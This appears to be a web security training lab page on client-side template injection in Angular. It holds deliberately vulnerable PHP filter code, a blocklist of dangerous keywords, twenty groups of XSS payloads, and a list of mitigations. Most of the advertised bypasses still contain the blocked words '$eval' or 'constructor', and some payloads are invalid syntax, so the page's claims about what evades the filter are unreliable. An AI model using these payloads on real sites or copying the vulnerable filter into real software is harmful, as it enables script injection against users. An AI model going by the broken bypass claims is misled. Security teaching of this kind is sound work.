Lab 2: CSTI with Filter Bypass

CSTI with security filters that can be bypassed

Difficulty: Medium

Lab Overview

This lab demonstrates CSTI vulnerabilities where basic security filters are implemented but can be bypassed using various techniques. The application filters dangerous patterns but doesn't prevent all attack vectors.

Objective: Bypass security filters to inject malicious template expressions and achieve XSS.

Vulnerable Code with Filters 
// Vulnerable: Basic filters that can be bypassed
function process_csti_with_filters($input) {
    $dangerous_patterns = ['$eval', 'constructor', 'alert', 'console', 'document', 'window'];
    
    // Check for dangerous patterns
    foreach ($dangerous_patterns as $pattern) {
        if (stripos($input, $pattern) !== false) {
            return "Dangerous pattern detected: " . $pattern;
        }
    }
    
    // Still vulnerable to bypass techniques
    return $input;
}

// Angular template (vulnerable)
<div ng-bind-html="userInput"></div>
<div>{{ userInput }}</div>
Filtered CSTI Tester
Active Filters

The following patterns are filtered:

  • $eval - Angular eval function
  • constructor - Constructor property
  • alert - Alert function
  • console - Console object
  • document - Document object
  • window - Window object
Bypass Techniques

Try these bypass methods:

  • {{ 7*7 }} - Math expression
  • {{ 'a'+'b' }} - String concatenation
  • {{ $eval('alert(1)') }} - Eval bypass
  • {{ constructor.constructor('alert(1)')() }} - Constructor bypass
Template Output
Angular Template Output
{{ userInput }}
Vulnerability Details
  • Type: CSTI with Filter Bypass
  • Severity: High
  • Method: POST
  • Issue: Inadequate security filters
Bypass Techniques
  • Obfuscation: Hide malicious patterns
  • Encoding: Use encoded characters
  • Alternative Methods: Use different execution methods
  • Complex Scenarios: Combine multiple techniques
CSTI Filter Bypass Payloads

Use these techniques to bypass security filters:

1. Basic Math Expressions (Not Filtered):
{{ 7*7 }} {{ 1+1 }} {{ 10-5 }} {{ 2*3 }} {{ 8/2 }}
2. String Concatenation (Not Filtered):
{{ 'Hello' + 'World' }} {{ 'a' + 'b' + 'c' }} {{ 'XSS' + 'Test' }} {{ 'CSTI' + 'Vulnerability' }}
3. Variable Access (Not Filtered):
{{ $root }} {{ $parent }} {{ $scope }} {{ this }} {{ self }}
4. Obfuscated Eval Calls:
{{ $eval('ale' + 'rt(1)') }} {{ $eval('con' + 'sole.log(1)') }} {{ $eval('doc' + 'ument.write(1)') }} {{ $eval('win' + 'dow.alert(1)') }}
5. Encoded Eval Calls:
{{ $eval('\x61\x6c\x65\x72\x74(1)') }} {{ $eval('\u0061\u006c\u0065\u0072\u0074(1)') }} {{ $eval(String.fromCharCode(97,108,101,114,116,40,49,41)) }}
6. Obfuscated Constructor Calls:
{{ constructor.constructor('ale' + 'rt(1)')() }} {{ constructor.constructor('con' + 'sole.log(1)')() }} {{ constructor.constructor('doc' + 'ument.write(1)')() }}
7. Encoded Constructor Calls:
{{ constructor.constructor('\x61\x6c\x65\x72\x74(1)')() }} {{ constructor.constructor('\u0061\u006c\u0065\u0072\u0074(1)')() }} {{ constructor.constructor(String.fromCharCode(97,108,101,114,116,40,49,41))() }}
8. Alternative Object Access:
{{ $root.constructor }} {{ $parent.constructor }} {{ $scope.constructor }} {{ this.constructor }}
9. Array Access Methods:
{{ [].constructor }} {{ [].constructor.constructor }} {{ [].constructor.constructor('ale' + 'rt(1)')() }} {{ [].constructor.constructor('con' + 'sole.log(1)')() }}
10. String Access Methods:
{{ 'a'.constructor }} {{ 'a'.constructor.constructor }} {{ 'a'.constructor.constructor('ale' + 'rt(1)')() }} {{ 'a'.constructor.constructor('con' + 'sole.log(1)')() }}
11. Number Access Methods:
{{ 1.constructor }} {{ 1.constructor.constructor }} {{ 1.constructor.constructor('ale' + 'rt(1)')() }} {{ 1.constructor.constructor('con' + 'sole.log(1)')() }}
12. Boolean Access Methods:
{{ true.constructor }} {{ true.constructor.constructor }} {{ true.constructor.constructor('ale' + 'rt(1)')() }} {{ true.constructor.constructor('con' + 'sole.log(1)')() }}
13. Function Access Methods:
{{ (function(){}).constructor }} {{ (function(){}).constructor.constructor }} {{ (function(){}).constructor.constructor('ale' + 'rt(1)')() }} {{ (function(){}).constructor.constructor('con' + 'sole.log(1)')() }}
14. Object Access Methods:
{{ {}.constructor }} {{ {}.constructor.constructor }} {{ {}.constructor.constructor('ale' + 'rt(1)')() }} {{ {}.constructor.constructor('con' + 'sole.log(1)')() }}
15. Date Access Methods:
{{ Date.constructor }} {{ Date.constructor.constructor }} {{ Date.constructor.constructor('ale' + 'rt(1)')() }} {{ Date.constructor.constructor('con' + 'sole.log(1)')() }}
16. Math Access Methods:
{{ Math.constructor }} {{ Math.constructor.constructor }} {{ Math.constructor.constructor('ale' + 'rt(1)')() }} {{ Math.constructor.constructor('con' + 'sole.log(1)')() }}
17. JSON Access Methods:
{{ JSON.constructor }} {{ JSON.constructor.constructor }} {{ JSON.constructor.constructor('ale' + 'rt(1)')() }} {{ JSON.constructor.constructor('con' + 'sole.log(1)')() }}
18. RegExp Access Methods:
{{ RegExp.constructor }} {{ RegExp.constructor.constructor }} {{ RegExp.constructor.constructor('ale' + 'rt(1)')() }} {{ RegExp.constructor.constructor('con' + 'sole.log(1)')() }}
19. Error Access Methods:
{{ Error.constructor }} {{ Error.constructor.constructor }} {{ Error.constructor.constructor('ale' + 'rt(1)')() }} {{ Error.constructor.constructor('con' + 'sole.log(1)')() }}
20. Advanced Bypass Techniques:
{{ $eval('$eval("ale" + "rt(1)")') }} {{ $eval('constructor.constructor("ale" + "rt(1)")()') }} {{ $eval('$root.constructor.constructor("ale" + "rt(1)")()') }} {{ $eval('$parent.constructor.constructor("ale" + "rt(1)")()') }}
Real-World Attack Scenarios
Mitigation Strategies
  • Implement comprehensive input validation and sanitization
  • Use whitelist-based filtering instead of blacklists
  • Implement proper output encoding
  • Use Content Security Policy (CSP) to prevent code execution
  • Regular security testing and vulnerability assessments
  • Monitor for unusual template processing patterns
  • Use Angular's built-in sanitization features
  • Implement proper template sandboxing
  • Use Web Application Firewall (WAF) to detect bypass attempts